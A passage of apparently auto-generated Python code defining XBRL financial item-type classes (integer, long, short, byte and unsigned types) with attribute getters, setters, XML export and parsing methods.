value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class integerItemType
class nonPositiveIntegerItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if nonPositiveIntegerItemType.subclass:
return nonPositiveIntegerItemType.subclass(*args_, **kwargs_)
else:
return nonPositiveIntegerItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='nonPositiveIntegerItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='nonPositiveIntegerItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='nonPositiveIntegerItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='nonPositiveIntegerItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='nonPositiveIntegerItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class nonPositiveIntegerItemType
class negativeIntegerItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if negativeIntegerItemType.subclass:
return negativeIntegerItemType.subclass(*args_, **kwargs_)
else:
return negativeIntegerItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='negativeIntegerItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='negativeIntegerItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='negativeIntegerItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='negativeIntegerItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='negativeIntegerItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class negativeIntegerItemType
class longItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if longItemType.subclass:
return longItemType.subclass(*args_, **kwargs_)
else:
return longItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='longItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='longItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='longItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='longItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='longItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class longItemType
class intItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if intItemType.subclass:
return intItemType.subclass(*args_, **kwargs_)
else:
return intItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='intItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='intItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='intItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='intItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='intItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class intItemType
class shortItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if shortItemType.subclass:
return shortItemType.subclass(*args_, **kwargs_)
else:
return shortItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='shortItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='shortItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='shortItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='shortItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='shortItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class shortItemType
class byteItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if byteItemType.subclass:
return byteItemType.subclass(*args_, **kwargs_)
else:
return byteItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='byteItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='byteItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='byteItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='byteItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='byteItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class byteItemType
class nonNegativeIntegerItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if nonNegativeIntegerItemType.subclass:
return nonNegativeIntegerItemType.subclass(*args_, **kwargs_)
else:
return nonNegativeIntegerItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='nonNegativeIntegerItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='nonNegativeIntegerItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='nonNegativeIntegerItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='nonNegativeIntegerItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='nonNegativeIntegerItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class nonNegativeIntegerItemType
class unsignedLongItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if unsignedLongItemType.subclass:
return unsignedLongItemType.subclass(*args_, **kwargs_)
else:
return unsignedLongItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='unsignedLongItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='unsignedLongItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='unsignedLongItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='unsignedLongItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='unsignedLongItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
